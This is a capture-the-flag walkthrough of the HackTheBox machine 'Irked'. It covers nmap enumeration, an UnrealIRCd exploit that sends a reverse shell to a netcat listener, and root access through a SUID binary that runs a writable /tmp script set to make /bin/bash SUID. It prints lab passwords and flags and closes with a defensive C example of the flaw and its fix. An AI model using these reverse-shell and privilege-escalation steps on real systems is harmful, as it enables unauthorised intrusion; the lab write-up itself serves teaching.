Irked

Last updated 2 years ago

Enumeration

As always, we start with the enumeration phase, in which we scan the machine looking for open ports and identify the services and versions running on them.

The following nmap command scans the target machine quickly for open ports and saves the output to a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.117 -oN allPorts

  • -sS use the TCP SYN scan. This scan type is relatively unobtrusive and stealthy, since it never completes the TCP handshake.

  • --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

  • -p- scan the entire port range, from 1 to 65535.

  • -T5 insane mode, the fastest of nmap's timing templates.

  • -Pn skip host discovery and treat the host as online.

  • -n scan without reverse DNS resolution.

  • -oN save the scan result into a file, in this case the allPorts file.

# Nmap 7.92 scan initiated Sun Jan  9 21:56:37 2022 as: nmap -sS --min-rate 5000 -p- -T5 -Pn -n -oN allPorts 10.10.10.117
Warning: 10.10.10.117 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.117
Host is up (0.071s latency).
Not shown: 60717 closed tcp ports (reset), 4811 filtered tcp ports (no-response)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
6697/tcp  open  ircs-u
8067/tcp  open  infi-async
38366/tcp open  unknown
65534/tcp open  unknown

# Nmap done at Sun Jan  9 21:57:02 2022 -- 1 IP address (1 host up) scanned in 25.49 seconds

As we see, a few ports are open.

Let's try to obtain the services and versions running on these ports. The following command scans these ports in more depth and saves the result into a file. Note that the port list contains a typo (38336 instead of the 38366 found by the first scan, which rpcinfo later reports as the status service), which is why this scan shows that port as closed:

nmap -sC -sV -p22,80,111,6697,8067,38336,65534 10.10.10.117 -oN targeted

  • -sC performs the scan using the default set of scripts.

  • -sV enables version detection.

  • -oN save the scan result into a file, in this case the targeted file.

# Nmap 7.92 scan initiated Sun Jan  9 22:17:17 2022 as: nmap -Pn -sCV -p22,80,111,6697,8067,38336,65534 -oN targeted 10.10.10.117
Nmap scan report for 10.10.10.117
Host is up (0.059s latency).

PORT      STATE  SERVICE VERSION
22/tcp    open   ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp    open   http    Apache httpd 2.4.10 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp   open   rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          38366/tcp   status
|   100024  1          44984/udp6  status
|   100024  1          53486/tcp6  status
|_  100024  1          53490/udp   status
6697/tcp  open   irc     UnrealIRCd
8067/tcp  open   irc     UnrealIRCd
38336/tcp closed unknown
65534/tcp open   irc     UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jan  9 22:17:27 2022 -- 1 IP address (1 host up) scanned in 10.13 seconds

Exploitation

There is an IRC server running UnrealIRCd. If you search for UnrealIRCd exploits on Google, you'll find one written in Python which sends a reverse shell back to a listener. Before executing the exploit, let's set up a netcat listener on port 4444.

nc -lvnp 4444

  • -l listen mode.

  • -v verbose mode.

  • -n numeric-only IP, no DNS resolution.

  • -p specify the port to listen on.

Then, we'll have to edit the exploit and add our IP address and the port on which netcat will be listening.

# Sets the local ip and port (address and port to listen on)
local_ip = '10.10.14.19'  # CHANGE THIS
local_port = '4444'  # CHANGE THIS 

Then all we have to do is execute the script with python, and we'll get a shell as the ircd user, but we won't be able to see the user flag yet.

python3 exploit.py -payload python 10.10.10.117 6697

listening on [any] 4444 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.117] 53010
ircd@irked:~/Unreal3.2$ whoami
whoami
ircd

Privilege Escalation

If we take a look at the home directories, we'll see that we can list the djmardov home directory, and that there is a .backup file in the user's Documents directory.

ls -la /home/djmardov/Documents/

total 16
drwxr-xr-x  2 djmardov djmardov 4096 May 15  2018 .
drwxr-xr-x 18 djmardov djmardov 4096 Nov  3  2018 ..
-rw-r--r--  1 djmardov djmardov   52 May 16  2018 .backup
-rw-------  1 djmardov djmardov   33 May 15  2018 user.txt

If we look inside, we'll find a password and a message saying that the password is for steg (steganography).

cat /home/djmardov/Documents/.backup

Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

If you look at the website found in the nmap scan, it serves an image. Maybe that image has a secret message hidden in it.

Let's download the image and use steghide to extract it.

steghide extract -sf irked.jpg

  • -sf select the stego file to extract from.

Anotar salvoconducto: UPupDOWNdownLRlrBAbaSSss
anoté los datos extraídos e/"pass.txt".

And we get a password.

cat pass.txt

Kab6h+m+bbp2J:HG

The machine also has an SSH service, so let's try to log in as the user djmardov with the password we found. Then we can grab the user flag.

ssh djmardov@10.10.10.117

djmardov@10.10.10.117's password: Kab6h+m+bbp2J:HG

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Feb  7 14:29:03 2022 from 10.10.14.19
djmardov@irked:~$ whoami
djmardov
djmardov@irked:~$ cat /home/djmardov/Documents/user.txt 
4a66a78b12dc0e661a59d3f5c0267a8e

Let's see if there is any SUID binary we can exploit.

find / -perm /4000 2>/dev/null

/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/sbin/exim4
/usr/sbin/pppd
/usr/bin/chsh
/usr/bin/procmail
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/at
/usr/bin/pkexec
/usr/bin/X
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/viewuser
/sbin/mount.nfs
/bin/su
/bin/mount
/bin/fusermount
/bin/ntfs-3g
/bin/umount

The /usr/bin/viewuser binary seems a bit odd. Let's execute it.

/usr/bin/viewuser

This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           Feb  7 14:17 (:0)
djmardov pts/1        Feb  7 15:14 (10.10.14.19)
sh: 1: /tmp/listusers: not found

The binary runs as root (it is SUID) and tries to execute /tmp/listusers through sh, a file which doesn't exist. Since anyone can write to /tmp, we can create that file ourselves; it will run as root and give the /bin/bash binary the SUID permission, so we can get a shell as the root user.

nano /tmp/listusers

# contents of /tmp/listusers
chmod +s /bin/bash

chmod +x /tmp/listusers

If we execute the viewuser binary again, it will execute our malicious script and the bash binary will have the SUID permission.

djmardov@irked:~$ ls -l /bin/bash
-rwxr-xr-x 1 root root 1105840 Nov  5  2016 /bin/bash
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           Feb  7 14:17 (:0)
djmardov pts/1        Feb  7 15:14 (10.10.14.19)
djmardov@irked:~$ ls -l /bin/bash
-rwsr-sr-x 1 root root 1105840 Nov  5  2016 /bin/bash

Finally, if we execute bash in privileged mode (-p, which keeps the effective UID of root instead of dropping it to the real UID), all we have to do is reap the harvest and take the root flag.

bash -p

bash-4.3# whoami
root
bash-4.3# cat /root/root.txt 
8d8e9e8be64654b6dccc3bff4522daf3
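As an added illustration (not code from this write-up), here is the viewuser defect in miniature next to a hardened version: a SUID-root program that hands a fixed path under /tmp to sh lets whoever can write /tmp decide what runs as root, so the safe variant checks that only root could have written the helper and drops root before running it. The function names are my own.

```c
#define _XOPEN_SOURCE 700
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>
#include <libgen.h>

/* Vulnerable pattern, as the write-up's output shows ("sh: 1: /tmp/listusers:
 * not found"): a SUID-root program runs system() on a path anyone can create. */
int run_helper_vulnerable(void)
{
    return system("/tmp/listusers");
}
/* Returns 1 only if 'path' is absolute, is a regular file (not a symlink)
 * owned by root and writable by root alone, and its directory is likewise
 * root-owned and not group/world-writable (so /tmp, mode 1777, fails). */
int only_root_can_write(const char *path)
{
    struct stat st;
    char dir[4096];
    if (path == NULL || path[0] != '/')
        return 0;
    if (lstat(path, &st) != 0 || !S_ISREG(st.st_mode))  /* missing, or a symlink */
        return 0;
    if (st.st_uid != 0 || (st.st_mode & (S_IWGRP | S_IWOTH)))
        return 0;
    snprintf(dir, sizeof dir, "%s", path);               /* dirname() may modify its argument */
    if (stat(dirname(dir), &st) != 0 || !S_ISDIR(st.st_mode))
        return 0;
    if (st.st_uid != 0 || (st.st_mode & (S_IWGRP | S_IWOTH)))
        return 0;
    return 1;
}
/* Hardened pattern: refuse an untrusted helper, then give up root before
 * running it, so the helper only ever runs with the caller's own privileges. */
int run_helper_hardened(const char *path)
{
    if (!only_root_can_write(path))
        return -1;
    if (setgid(getgid()) != 0 || setuid(getuid()) != 0)
        return -1;
    return system(path);
}

int main(void)
{
    printf("/tmp/listusers: %d  /etc/passwd: %d\n", only_root_can_write("/tmp/listusers"), only_root_can_write("/etc/passwd"));
    return 0;
}
```

The same ownership and writability checks are what to look for when auditing any SUID binary that calls external programs: a helper in /tmp, a relative path, or a group-writable directory all fail them.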
